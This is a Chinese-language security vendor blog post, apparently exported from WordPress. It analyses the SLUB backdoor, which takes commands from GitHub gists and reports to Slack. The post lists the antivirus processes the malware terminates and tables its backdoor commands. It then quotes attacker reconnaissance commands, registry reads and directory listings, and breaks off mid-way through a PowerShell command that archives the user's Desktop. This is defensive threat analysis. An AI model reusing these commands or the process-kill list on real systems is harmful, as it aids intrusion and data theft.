{"id":59923,"date":"2019-03-25T09:00:31","date_gmt":"2019-03-25T01:00:31","guid":{"rendered":"https:\/\/blog.trendmicro.com.tw\/?p=59923"},"modified":"2019-03-19T17:22:11","modified_gmt":"2019-03-19T09:22:11","slug":"%e9%81%8b%e7%94%a8-github-%e4%b8%a6%e9%80%8f%e9%81%8e-slack-%e4%be%86%e9%80%9a%e8%a8%8a%e7%9a%84%e6%9c%80%e6%96%b0-slub-%e5%be%8c%e9%96%80%e7%a8%8b%e5%bc%8f","status":"publish","type":"post","link":"https:\/\/blog.trendmicro.com.tw\/?p=59923","title":{"rendered":"\u904b\u7528 GitHub \u4e26\u900f\u904e Slack \u4f86\u901a\u8a0a\u7684\u6700\u65b0 SLUB \u5f8c\u9580\u7a0b\u5f0f"},"content":{"rendered":"\n<p>\u6700\u8fd1<a href=\"https:\/\/www.trendmicro.com.tw\/edm\/Tracking.asp?id=2651&amp;name=20110916\">\u8da8\u52e2\u79d1\u6280<\/a>\u9047\u5230\u4e86\u4e00\u500b\u5728\u5404\u65b9\u9762\u90fd\u4ee4\u6211\u5011\u8a1d\u7570\u7684\u672a\u77e5\u60e1\u610f\u7a0b\u5f0f\u3002\u9996\u5148\uff0c\u6211\u5011\u767c\u73fe\u5b83\u662f\u7d93\u7531<a href=\"https:\/\/www.trendmicro.com\/vinfo\/us\/threat-encyclopedia\/web-attack\/137\/watering-hole-101\">\u6c34\u5751\u5f0f\u653b\u64ca<\/a>\u4f86\u6563\u5e03\uff0c\u8981\u4f7f\u7528\u9019\u9805\u6563\u6b65\u6280\u5de7\uff0c\u6b79\u5f92\u5fc5\u9808\u5148\u99ed\u5165\u67d0\u500b\u7db2\u7ad9\uff0c\u7136\u5f8c\u5728\u7db2\u9801\u4e2d\u63d2\u5165\u7a0b\u5f0f\u78bc\u4f86\u5c07\u8a2a\u5ba2\u91cd\u5c0e\u5230\u7528\u4f86\u611f\u67d3\u96fb\u8166\u7684\u7db2\u9801\u3002\u5728\u6b64\u6848\u4f8b\u7576\u4e2d\uff0c\u6bcf\u4f4d\u8a2a\u5ba2\u53ea\u6703\u88ab\u91cd\u5c0e\u4e00\u6b21\uff0c\u800c\u611f\u67d3\u6642\u6703\u653b\u64ca\u00a0<a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2018-8174\">CVE-2018-8174<\/a> \u9019\u500b VBScript \u5f15\u64ce\u7684\u6f0f\u6d1e\u3002\u4e0d\u904e\uff0c\u6b64\u6f0f\u6d1e\u65e9\u5728 2018 \u5e74 5 \u6708 <a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/microsoft-patch-tuesday-for-may-includes-updates-for-actively-exploited-vulnerabilities-2\/\">Microsoft \u5373\u5df2\u4fee\u6b63<\/a>\u3002<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"alignleft\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2016\/08\/rootkit-feature-200x200.png\" alt=\"\u904b\u7528 GitHub \u4e26\u900f\u904e Slack \u4f86\u901a\u8a0a\u7684\u6700\u65b0 SLUB \u5f8c\u9580\u7a0b\u5f0f\"\/><\/figure><\/div>\n\n\n\n<p>\u5176\u6b21\uff0c\u60e1\u610f\u7a0b\u5f0f\u63a1\u7528\u7684\u662f\u591a\u91cd\u968e\u6bb5\u611f\u67d3\u6280\u5de7\u3002\u5728\u653b\u64ca\u524d\u8ff0\u6f0f\u6d1e\u4e4b\u5f8c\uff0c\u60e1\u610f\u7a0b\u5f0f\u6703\u4e0b\u8f09\u4e00\u500b DLL \u52d5\u614b\u9023\u7d50\u7a0b\u5f0f\u5eab\u6a94\u6848\uff0c\u4e26\u4f7f\u7528\nPowerShell (PS) \u4f86\u57f7\u884c\u6b64\u6a94\u6848\u3002\u8a72\u6a94\u6848\u5176\u5be6\u4e5f\u662f\u4e00\u500b\u6a94\u6848\u4e0b\u8f09\u7a0b\u5f0f\uff0c\u5b83\u6703\u4e0b\u8f09\u4e26\u57f7\u884c\u53e6\u4e00\u500b\u5f8c\u9580\u7a0b\u5f0f\u7684\u57f7\u884c\u6a94\u3002\u6b64\u5916\uff0c\u7b2c\u4e00\u968e\u6bb5\u4e0b\u8f09\u7a0b\u5f0f\u6703\u6aa2\u67e5\u4f7f\u7528\u8005\u7684\u96fb\u8166\u4e0a\u662f\u5426\u6709\u67d0\u4e9b\u9632\u6bd2\u8edf\u9ad4\u6b63\u5728\u57f7\u884c\uff0c\u5982\u679c\u6709\u7684\u8a71\u5c31\u5c07\u9632\u6bd2\u8edf\u9ad4\u7684\u57f7\u884c\u7a0b\u5e8f\u7d42\u6b62\u3002\u5728\u6211\u5011\u767c\u73fe\u6b64\u60e1\u610f\u7a0b\u5f0f\u7684\u7576\u4e0b\uff0c\u5404\u5bb6\u9632\u6bd2\u8edf\u9ad4\u4f3c\u4e4e\u90fd\u9084\u4e0d\u8a8d\u5f97\u9019\u500b\u60e1\u610f\u7a0b\u5f0f\u3002<\/p>\n\n\n\n<p>\u9664\u4e86\u5148\u524d\u63d0\u5230\u7684\u72c0\u6cc1\u4e4b\u5916\uff0c\u6211\u5011\u4e5f\u5f88\u5feb\u6ce8\u610f\u5230\u6b64\u60e1\u610f\u7a0b\u5f0f\u6703\u9023\u7dda\u81f3 Slack \u9019\u500b\u5354\u540c\u4f5c\u696d\u8a0a\u606f\u5e73\u53f0\uff0c\u5728\u9019\u5e73\u53f0\u4e0a\uff0c\u4f7f\u7528\u8005\u53ef\u5229\u7528\u983b\u9053\u4f86\u5efa\u7acb\u81ea\u5df1\u7684\u5de5\u4f5c\u7a7a\u9593\n(Workspace)\uff0c\u6709\u9ede\u985e\u4f3c IRC \u804a\u5929\u7cfb\u7d71\u3002\u9019\u4e00\u9ede\u5f88\u6709\u610f\u601d\uff0c\u56e0\u70ba\u6211\u5011\u81f3\u4eca\u5c1a\u672a\u898b\u904e\u6709\u54ea\u500b\u60e1\u610f\u7a0b\u5f0f\u5229\u7528 Slack \u4f86\u9032\u884c\u901a\u8a0a\u3002<\/p>\n\n\n\n<p>\u6839\u64da<a href=\"https:\/\/www.trendmicro.com.tw\/edm\/Tracking.asp?id=2651&amp;name=20110916\">\u8da8\u52e2\u79d1\u6280<\/a>\u5c0d\u99ed\u5ba2\u653b\u64ca\u5de5\u5177\u3001\u6280\u5de7\u53ca\u7a0b\u5e8f\u7684\u6280\u8853\u6027\u5206\u6790\uff0c\u6211\u5011\u8a8d\u70ba\u9019\u9805\u5a01\u8105\u61c9\u8a72\u8207\u4e00\u8d77\u96b1\u533f\u7684\u91dd\u5c0d\u6027\u653b\u64ca\u6709\u95dc\uff0c\u4e26\u4e14\u7531\u5177\u5099\u76f8\u7576\u6280\u5de7\u7684\u99ed\u5ba2\u6240\u767c\u52d5\uff0c\u800c\u975e\u4e00\u822c\u7684\u7db2\u8def\u72af\u7f6a\u653b\u64ca\u3002<\/p>\n\n\n\n<!--more-->\n\n\n\n<p><a href=\"https:\/\/www.trendmicro.com.tw\/edm\/Tracking.asp?id=2651&amp;name=20110916\">\u8da8\u52e2\u79d1\u6280<\/a>\u4e00\u767c\u73fe\u6b64\u60e1\u610f\u7a0b\u5f0f\u4fbf\u7acb\u5373\u901a\u77e5\u4e86\u52a0\u62ff\u5927\u7db2\u8def\u8cc7\u5b89\u4e2d\u5fc3\n(Canadian Centre for Cyber Security)\uff0c\u8a72\u4e2d\u5fc3\u662f\u52a0\u62ff\u5927\u7684\u570b\u5bb6\u96fb\u8166\u8cc7\u5b89\u4e8b\u4ef6\u61c9\u8b8a\u5c0f\u7d44 (Canada\u2019s National Computer Security Incident Response Team\uff0c\u7c21\u7a31\nCSIRT)\u3002\u8a72\u4e2d\u5fc3\u4e5f\u901a\u77e5\u4e86\u53d7\u5bb3\u7684\u7db2\u7ad9\uff0c\u5354\u52a9\u4ed6\u5011\u4e86\u89e3\u767c\u73fe\u5230\u7684\u60e1\u610f\u7a0b\u5f0f\u4e26\u63d0\u4f9b\u77ef\u6b63\u5efa\u8b70\u3002<\/p>\n\n\n\n<p><strong><em>\u5b8c\u6574\u611f\u67d3\u904e\u7a0b<\/em><\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/03\/SLUB-Figure-1.jpg\" alt=\" Figure 1. The infection chain of the attack\"\/><\/figure>\n\n\n\n<p><a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/03\/SLUB-Figure-1.jpg\"><\/a><em>\u5716\n1\uff1a\u653b\u64ca\u611f\u67d3\u904e\u7a0b\u793a\u610f\u5716\u3002<\/em><\/p>\n\n\n\n<p><strong><em>\u60e1\u610f\u6a94\u6848\u4e0b\u8f09\u7a0b\u5f0f<\/em><\/strong><\/p>\n\n\n\n<p>\u9019\u8d77\u653b\u64ca\u7684\u60e1\u610f\u6a94\u6848\u4e0b\u8f09\u7a0b\u5f0f\u662f\u4e00\u500b\u7d93\u7531 PowerShell \u57f7\u884c\u7684 DLL \u6a94\u6848\uff0c\u8a72\u6a94\u6848\u6709\u5e7e\u9805\u529f\u80fd\u3002\u9996\u5148\uff0c\u5b83\u6703\u4e0b\u8f09\u7b2c\u4e8c\u968e\u6bb5\u7684\u5f8c\u9580\u7a0b\u5f0f\u4e26\u52a0\u4ee5\u57f7\u884c\uff0c\u6211\u5011\u5c07\u5b83\u547d\u540d\u70ba\u300cSLUB\u300d(SLack\n\u548c githUB \u7684\u7e2e\u5beb\uff0c\u6b63\u5f0f\u540d\u7a31\uff1a<strong>Backdoor.Win32.SLUB.A<\/strong>)\u3002\u5176\u6b21\uff0c\u5b83\u6703\u6aa2\u67e5\u96fb\u8166\u4e0a\u662f\u5426\u6709\u4ee5\u4e0b\u9632\u6bd2\u8edf\u9ad4\u57f7\u884c\u7a0b\u5e8f\uff1a<\/p>\n\n\n\n<ul><li>V3Tray.exe<\/li><li>AYAgent.aye<\/li><li>navapsvc.exe<\/li><li>ashServ.exe<\/li><li>avgemc.exe<\/li><li>bdagent.exe<\/li><li>ZhuDongFangYu.exe<\/li><\/ul>\n\n\n\n<p>\u82e5\u6709\uff0c\u5c31\u5c07\u57f7\u884c\u7a0b\u5e8f\u7d42\u6b62\u3002<\/p>\n\n\n\n<p>\u6700\u5f8c\uff0c\u4e0b\u8f09\u7a0b\u5f0f\u6703\u653b\u64ca CVE-2015-1701 \u6f0f\u6d1e\u4f86\u63d0\u5347\u6b0a\u9650\uff0c\u5176\u6f0f\u6d1e\u653b\u64ca\u7a0b\u5f0f\u78bc\u5f88\u53ef\u80fd\u662f\u53d6\u81ea\u67d0\u500b <a href=\"https:\/\/github.com\/hfiref0x\/CVE-2015-1701\/blob\/master\/Source\/Taihou\/main.c\">GitHub \u5132\u5b58\u5eab<\/a> (\u5982\u4e0b\u5716\u6240\u793a)\uff0c\u7136\u5f8c\u518d\u52a0\u4ee5\u4fee\u6539\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/03\/SLUB-Figure-2.jpg\" alt=\" Figure 2. The unmodified code\"\/><\/figure>\n\n\n\n<p><a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/03\/SLUB-Figure-2.jpg\"><\/a><em>\u5716\n2\uff1a\u4fee\u6539\u524d\u7684\u7a0b\u5f0f\u78bc\u3002<\/em><\/p>\n\n\n\n<p><em><strong>SLUB \u5f8c\u9580\u7a0b\u5f0f<\/strong><\/em><\/p>\n\n\n\n<p>SLUB \u5f8c\u9580\u7a0b\u5f0f\u662f\u4e00\u500b\u63a1\u7528 C++ \u7a0b\u5f0f\u8a9e\u8a00\u64b0\u5beb\u7684\u5ba2\u88fd\u5316\u5f8c\u9580\u7a0b\u5f0f\uff0c\u4e26\u5229\u7528 curl \u975c\u614b\u9023\u7d50\u7a0b\u5f0f\u5eab\u4f86\u57f7\u884c\u5404\u7a2e\nHTTP \u8acb\u6c42\uff0c\u6b64\u5916\u9084\u7528\u5230\u5176\u4ed6\u5169\u500b\u975c\u614b\u9023\u7d50\u7a0b\u5f0f\uff1aboost (\u7528\u4f86\u5f9e gist snippet \u7576\u4e2d\u64f7\u53d6\u6307\u4ee4) \u8207 JsonCpp (\u7528\u4f86\u89e3\u6790 slack \u983b\u9053\u901a\u8a0a)\u3002<\/p>\n\n\n\n<p>\u4e0d\u50c5\u5982\u6b64\uff0c\u60e1\u610f\u7a0b\u5f0f\u4e5f\u7528\u5230\u5169\u500b\u6388\u6b0a\u91d1\u9470\u4f86\u8207 Slack API \u901a\u8a0a\u3002<\/p>\n\n\n\n<ul><li>\u5b83\u6703\u5c07\u81ea\u5df1\u8907\u88fd\u5230\u300cProgramData\\update\\\u300d\u7576\u4e2d\uff0c\u7136\u5f8c\u518d\u900f\u904e\u300cRun\u300d\u7cfb\u7d71\u767b\u9304\u6a5f\u78bc\uff0c\u4f7f\u7528\nrundll32.exe \u547c\u53eb\u300cUpdateMPUnits\u300d\u532f\u51fa\u51fd\u5f0f\uff0c\u4ee5\u4fbf\u9577\u671f\u6f5b\u4f0f\u5728\u7cfb\u7d71\u5167\u3002\u8acb\u6ce8\u610f\u5176\u6a5f\u78bc\u7684\u300cValueName\u300d\u6578\u503c\u300cMicrosoft\nSetup Initializazion\u300d\u6709\u62fc\u5b57\u932f\u8aa4 (\u6b63\u78ba\u7684\u62fc\u6cd5\u61c9\u8a72\u662f\u300cInitialization\u300d)\u3002<\/li><\/ul>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/03\/SLUB-Figure-3.jpg\" alt=\" Figure 3. Screenshots of the Run registry key\"\/><\/figure>\n\n\n\n<p><a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/03\/SLUB-Figure-3.jpg\"><\/a><\/p>\n\n\n\n<p><em>\u5716 3\uff1a\u5beb\u5165\u300cRun\u300d\u7cfb\u7d71\u767b\u9304\u6a5f\u78bc\u7684\u5167\u5bb9\u3002<\/em><\/p>\n\n\n\n<ul><li>\u5b83\u6703\u5f9e Github \u4e0b\u8f09\u67d0\u500b\ngist snippet\uff0c\u7136\u5f8c\u89e3\u6790\u7576\u4e2d\u7684\u6307\u4ee4\u4f86\u57f7\u884c (\u5f8c\u9762\u6703\u518d\u591a\u505a\u8aaa\u660e)\u3002\u5176\u4e2d\uff0c\u53ea\u6709\u4ee5\u300c^\u300d\u5b57\u5143\u958b\u982d\u4e26\u4ee5\u300c$\u300d\u5b57\u5143\u7d50\u5c3e\u7684\u6307\u4ee4\u624d\u6703\u88ab\u57f7\u884c\uff0c\u5176\u4ed6\u8cc7\u6599\u5c07\u88ab\u5ffd\u7565\u3002<\/li><\/ul>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/03\/SLUB-Figure-4-1.jpg\" alt=\" Figure 4. The \u201cgist\u201d snippet that is downloaded from Github\"\/><\/figure>\n\n\n\n<p><a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/03\/SLUB-Figure-4-1.jpg\"><\/a><\/p>\n\n\n\n<p><em>\u5716 4\uff1a\u5f9e Github \u4e0b\u8f09\u7684 gist\nsnippet\u3002<\/em><\/p>\n\n\n\n<p>\u6307\u4ee4\u7684\u57f7\u884c\u7d50\u679c\u6703\u5229\u7528\u524d\u8ff0\u7684\u5167\u5d4c\u91d1\u9470\u767c\u9001\u5230\u4e00\u500b Slack \u5de5\u4f5c\u7a7a\u9593\u7684\u79c1\u4eba\u983b\u9053\u7576\u4e2d\u3002<\/p>\n\n\n\n<p>\u8acb\u6ce8\u610f\uff0c\u9019\u6a23\u7684\u4f5c\u6cd5\u6709\u500b\u7f3a\u9ede\u662f\u99ed\u5ba2\u7121\u6cd5\u5c0d\u7279\u5b9a\u76ee\u6a19\u4e0b\u9054\u6307\u4ee4\uff0c\u6bcf\u4e00\u53f0\u88ab\u611f\u67d3\u7684\u96fb\u8166\u90fd\u6703\u57f7\u884c gist snippet \u7576\u4e2d\u7684\u6307\u4ee4\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/03\/SLUB-Figure-5-1.jpg\" alt=\" Figure 5. Scheme of the backdoor communication, with the first arrow starting from the person who initiates the connection\"\/><\/figure>\n\n\n\n<p><a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/03\/SLUB-Figure-5-1.jpg\"><\/a><\/p>\n\n\n\n<p><em>\u5716 5\uff1a\u5f8c\u9580\u7a0b\u5f0f\u901a\u8a0a\u6a5f\u5236\uff0c\u901a\u8a0a\u5fc5\u9808\u7531\u99ed\u5ba2\u767c\u8d77\u3002<\/em><\/p>\n\n\n\n<p><strong><em>\u5f8c\u9580\u7a0b\u5f0f\u529f\u80fd<\/em><\/strong><\/p>\n\n\n\n<p>\u6b64\u5f8c\u9580\u7a0b\u5f0f\u652f\u63f4\u4ee5\u4e0b\u6307\u4ee4\u548c\u526f\u6307\u4ee4 (\u5927\u591a\u6578\u90fd\u4e0d\u9700\u591a\u52a0\u89e3\u91cb\u61c9\u8a72\u5c31\u80fd\u4e00\u76ee\u4e86\u7136)\uff0c\u6307\u4ee4\u7684\u53c3\u6578\u4f7f\u7528\u9017\u9ede\u300c,\u300d\u5206\u958b&nbsp; (\u5982\u524d\u9762\u5716 4 \u6240\u793a)\uff1a<\/p>\n\n\n\n<table  class=\"wp-block-table table table-hover\" ><tbody><tr><td>\n  <strong>\u6307\u4ee4\u5217<\/strong>\n  <\/td><td>\n  <strong>\u8a73\u7d30\u8cc7\u8a0a<\/strong>\n  <\/td><\/tr><tr><td>\n  <em>exec<\/em>\n  <\/td><td>\n  \u5229\u7528 cmd.exe \u4f86\u57f7\u884c\u6307\u4ee4\u3002\n  <\/td><\/tr><tr><td>\n  <em>dnexec<\/em>\n  <\/td><td>\n  \u4e0b\u8f09\u4e26\u57f7\u884c\u6307\u4ee4\u3002\n  <\/td><\/tr><tr><td>\n  <em>update<\/em>\n  <\/td><td>\n  \u4e0b\u8f09\u67d0\u500b\u6a94\u6848\uff0c\u5c07\u7576\u524d\u7684\u7248\u672c\u79fb\u9664\uff0c\u7136\u5f8c\u57f7\u884c\u4e0b\u8f09\u7684\u6a94\u6848\u3002\n  <\/td><\/tr><tr><td>\n  <em>destroy<\/em>\n  <\/td><td>\n  \u5229\u7528\u6279\u6b21\u8173\u672c\u522a\u9664\u786c\u789f\u4e0a\u7684\u60e1\u610f\u7a0b\u5f0f\u3002\n  <\/td><\/tr><tr><td>\n  <em>capture<\/em>\n  <\/td><td>\n  \u64f7\u53d6\u87a2\u5e55\u6293\u5716\u4e26\u50b3\u9001\u81f3 Slack \u983b\u9053\u3002\n  <\/td><\/tr><tr><td>\n  <strong>file<\/strong>\n  <\/td><\/tr><tr><td>\n  <em>list<\/em>\n  <\/td><td>\n  \u5217\u51fa\u67d0\u500b\u6a94\u6848\u3002\n  <\/td><\/tr><tr><td>\n  <em>copy<\/em>\n  <\/td><td>\n  \u8907\u88fd\u67d0\u500b\u6a94\u6848\u3002\n  <\/td><\/tr><tr><td>\n  <em>delete<\/em>\n  <\/td><td>\n  \u522a\u9664\u67d0\u500b\u6a94\u6848\u3002\n  <\/td><\/tr><tr><td>\n  <em>upload<\/em>\n  <\/td><td>\n  \u5c07\u672c\u5730\u7aef\u6a94\u6848\u4e0a\u50b3\u81f3 file.io \u7db2\u7ad9\uff0c\u5c07\u4e0b\u8f09\u9023\u7d50\u8cbc\u5230 Slack \u983b\u9053\u7576\u4e2d\u3002\n  <\/td><\/tr><tr><td>\n  <strong>dir<\/strong>\n  <\/td><\/tr><tr><td>\n  <em>create<\/em>\n  <\/td><td>\n  \u5efa\u7acb\u76ee\u9304\u3002\n  <\/td><\/tr><tr><td>\n  <em>remove<\/em>\n  <\/td><td>\n  \u79fb\u9664\u76ee\u9304\u3002\n  <\/td><\/tr><tr><td>\n  <strong>proc<\/strong>\n  <\/td><\/tr><tr><td>\n  <em>list<\/em>\n  <\/td><td>\n  \u5217\u51fa\u57f7\u884c\u7a0b\u5e8f\u3002\n  <\/td><\/tr><tr><td>\n  <em>kill<\/em>\n  <\/td><td>\n  \u7d42\u6b62\u57f7\u884c\u7a0b\u5e8f\u3002\n  <\/td><\/tr><tr><td>\n  <strong>drive<\/strong>\n  <\/td><\/tr><tr><td>\n  <em>list<\/em>\n  <\/td><td>\n  \u53d6\u5f97\u7576\u524d\u786c\u789f\u6bcf\u500b\u78c1\u5377\u7684\u76f8\u95dc\u8cc7\u8a0a\uff0c\u4f8b\u5982\uff1a\u5269\u9918\u7a7a\u9593\u3001\u8a73\u7d30\u5c6c\u6027\u8cc7\u6599\u3001USN \u65e5\u8a8c\u555f\u7528\u72c0\u614b\u3001\u52a0\u5bc6\u72c0\u614b\u7b49\u7b49\u3002\n  <\/td><\/tr><tr><td>\n  <strong>reg<\/strong>\n  <\/td><\/tr><tr><td>\n  <em>Query<\/em>\n  <\/td><td>\n  \u67e5\u8a62\u7cfb\u7d71\u767b\u9304\u6a5f\u78bc\u3002\n  <\/td><\/tr><tr><td>\n  <em>Read<\/em>\n  <\/td><td>\n  \u8b80\u53d6\u7cfb\u7d71\u767b\u9304\u6a5f\u78bc\u3002\n  <\/td><\/tr><tr><td>\n  <em>Write<\/em>\n  <\/td><td>\n  \u5beb\u5165\u7cfb\u7d71\u767b\u9304\u6a5f\u78bc\u3002\n  <\/td><\/tr><tr><td>\n  <em>tmout<\/em>\n  <\/td><td>\n  \u547c\u53eb\u300csleep\u300d(\u7761\u7720) \u529f\u80fd\u3002\n  <\/td><\/tr><\/tbody><\/table>\n\n\n\n<p><br>\n<strong><em>Slack\n\u901a\u8a0a\u76f8\u95dc\u529f\u80fd<\/em><\/strong><\/p>\n\n\n\n<p>Slack \u901a\u8a0a\u76f8\u95dc\u529f\u80fd\u542b\u6709\u5169\u500b\u5beb\u6b7b\u7684\u8a8d\u8b49\u91d1\u9470\u4e26\u5207\u5272\u6210\u591a\u500b\u5c0f\u584a\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/03\/SLUB-Figure-6-1.jpg\" alt=\" Figure 6. Code of the communication function\"\/><\/figure>\n\n\n\n<p><a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/03\/SLUB-Figure-6-1.jpg\"><\/a><\/p>\n\n\n\n<p><em>\u5716 6\uff1a\u901a\u8a0a\u529f\u80fd\u7a0b\u5f0f\u78bc\u3002<\/em><\/p>\n\n\n\n<p>\u96a8\u5f8c\uff0c\u5f8c\u9580\u7a0b\u5f0f\u6703\u53d6\u5f97\u4f7f\u7528\u8005\u540d\u7a31\u548c\u96fb\u8166\u540d\u7a31 (\u5982\u5716 7) \u7136\u5f8c\u5efa\u7acb\u4e00\u500b Slack \u983b\u9053\u4e26\u4e0a\u50b3\u8a0a\u606f\u3002\u5b83\u6703\u5229\u7528\u4ee5\u4e0b\nAPI \u4f86\u767c\u9001\u8a0a\u606f\uff1a<\/p>\n\n\n\n<ul><li>https:\/\/api.slack.com\/methods\/chat.postMessage<\/li><\/ul>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/03\/SLUB-Figure-7.jpg\" alt=\" Figure 7. Retrieving the username and computer name\"\/><\/figure>\n\n\n\n<p><a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/03\/SLUB-Figure-7.jpg\"><\/a><\/p>\n\n\n\n<p><em>\u5716 7\uff1a\u53d6\u5f97\u4f7f\u7528\u8005\u540d\u7a31\u548c\u96fb\u8166\u540d\u7a31\u3002<\/em><\/p>\n\n\n\n<p>\u5728\u76f8\u95dc\u529f\u80fd\u51fd\u5f0f\u7576\u4e2d\u53ef\u660e\u986f\u770b\u5230\u300ctitle\u300d(\u6a19\u984c)\u3001\u300ctext\u300d(\u6587\u5b57)\u3001\u300cchannel\u300d(\u983b\u9053)\u3001\u300cattachments\u300d(\u9644\u4ef6)\n\u7b49\u95dc\u9375\u5b57\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/03\/SLUB-Figure-8.jpg\" alt=\" Figure 8. Function listing showing keywords\"\/><\/figure>\n\n\n\n<p><a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/03\/SLUB-Figure-8.jpg\"><\/a><\/p>\n\n\n\n<p><em>\u5716 8\uff1a\u5728\u529f\u80fd\u51fd\u5f0f\u7576\u4e2d\u53ef\u770b\u5230\u4e00\u4e9b\u95dc\u9375\u5b57\u3002<\/em><\/p>\n\n\n\n<p>\u6bcf\u500b\u6307\u4ee4\u57f7\u884c\u5f8c\u7684\u8f38\u51fa\u7d50\u679c\u90fd\u6703\u767c\u9001\u81f3\u4e00\u500b Slack \u79c1\u4eba\u983b\u9053\u4e2d\uff0c\u800c\u6307\u4ee4\u672c\u8eab\u5247\u662f\u900f\u904e\u53e6\u4e00\u500b Slack \u79c1\u4eba\u983b\u9053\uff0c\u4ee5\u9644\u4ef6\u7684\u5f62\u5f0f\u767c\u9001\u4e26\u4f7f\u7528\u4ee5\u4e0b\u6587\u5b57\uff1a<em>*computername:username*\u3002<\/em><\/p>\n\n\n\n<p><strong><em>\u99ed\u5ba2\u7684\u653b\u64ca\u5de5\u5177\u3001\u6280\u5de7\u548c\u7a0b\u5e8f<\/em><\/strong><\/p>\n\n\n\n<p>\u9019\u8d77\u653b\u64ca\u6240\u7528\u5230\u7684 Github \u5e33\u865f\u548c Slack \u5de5\u4f5c\u7a7a\u9593\u90fd\u662f\u5728 2 \u6708 19 \u548c 20 \u65e5\u5169\u5929\u7279\u5225\u91dd\u5c0d\u8a72\u8d77\u653b\u64ca\u884c\u52d5\u800c\u5efa\u7acb\uff0c\u81f3\u65bc\u99ed\u5ba2\u6240\u7528\u5230\u7684\u60e1\u610f\u7a0b\u5f0f\uff0c\u6211\u5011\u63a8\u6e2c\u61c9\u8a72\u662f\u5728\n2 \u6708 22 \u65e5\u6240\u7d44\u8b6f\u3002<\/p>\n\n\n\n<p>\u99ed\u5ba2\u5728 2 \u6708 20 \u65e5\u5c07\u7b2c\u4e00\u6279\u6307\u4ee4\u52a0\u5165 Github \u7576\u4e2d\u3002\u4e0d\u904e\u82e5\u5f9e Slack \u983b\u9053\u4f86\u770b\uff0c\u6211\u5011\u53ef\u4ee5\u767c\u73fe\u99ed\u5ba2\u66fe\u7d93\u5728\n2 \u6708 23 \u548c 24 \u65e5\u5169\u5929\u6e2c\u8a66\u904e\u60e1\u610f\u7a0b\u5f0f\u3002\u7b2c\u4e00\u6279\u53d7\u5bb3\u8005\u5247\u662f\u5f9e 2 \u6708 27 \u65e5\u958b\u59cb\u51fa\u73fe\u3002<\/p>\n\n\n\n<p>\u99ed\u5ba2\u7684\u7b2c\u4e00\u6b65\u884c\u52d5\u5c31\u662f\u5148\u5f9e\u5df2\u611f\u67d3\u7684\u96fb\u8166\u4e0a\u64f7\u53d6\u66f4\u591a\u8cc7\u8a0a\u4ee5\u9032\u4e00\u6b65\u4e86\u89e3\u53d7\u5bb3\u96fb\u8166\uff1a<\/p>\n\n\n\n<p>^exec,tasklist$<\/p>\n\n\n\n<p>^capture$<\/p>\n\n\n\n<p>^drive,list$<\/p>\n\n\n\n<p>^file,list,C:\\Users\\$<\/p>\n\n\n\n<p>^reg,read,HKEY_CURRENT_USER,SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run$<\/p>\n\n\n\n<p>\u4ed6\u5011\u6703\u67e5\u770b\u96fb\u8166\u4e0a\u7684\u57f7\u884c\u7a0b\u5e8f\u3001\u64f7\u53d6\u87a2\u5e55\u6293\u5716\u3001\u5217\u51fa\u6240\u6709\u786c\u789f\u8207\u4f7f\u7528\u8005\uff0c\u4e26\u4e14\u5efa\u7acb\u7cfb\u7d71\u767b\u9304\u4f86\u8b93\u60e1\u610f\u7a0b\u5f0f\u5e38\u99d0\u3002<\/p>\n\n\n\n<p>\u6b64\u5916\uff0c\u4e5f\u6703\u5217\u51fa\u4e00\u4e9b\u5e38\u898b\u76ee\u9304\u7684\u6a94\u6848\u6e05\u55ae\uff1a<\/p>\n\n\n\n<p>^exec,dir \/s\nC:\\Users\\USER\\Desktop\\$\\<\/p>\n\n\n\n<p>^exec,dir \/s\nC:\\Users\\USER\\Downloads\\$\\<\/p>\n\n\n\n<p>^exec,dir \/s\nC:\\Users\\USER\\Recent\\$<\/p>\n\n\n\n<p>\u6211\u5011\u5c0d\u67d0\u4e9b\u6307\u4ee4\u7279\u5225\u611f\u5230\u8208\u8da3\uff0c\u4f8b\u5982\u67d0\u500b\u53ef\u8b93\u99ed\u5ba2\u5c07\u4f7f\u7528\u8005\u6574\u500b\u300c\u684c\u9762\u300d\u8cc7\u6599\u593e\u8b8a\u6210\u4e00\u500b\u58d3\u7e2e\u6a94\u7684\u6307\u4ee4\uff0c\u5982\u4e0b\u6240\u793a\uff1a<\/p>\n\n\n\n<p>^exec,powershell\n-Command compress-archive -path 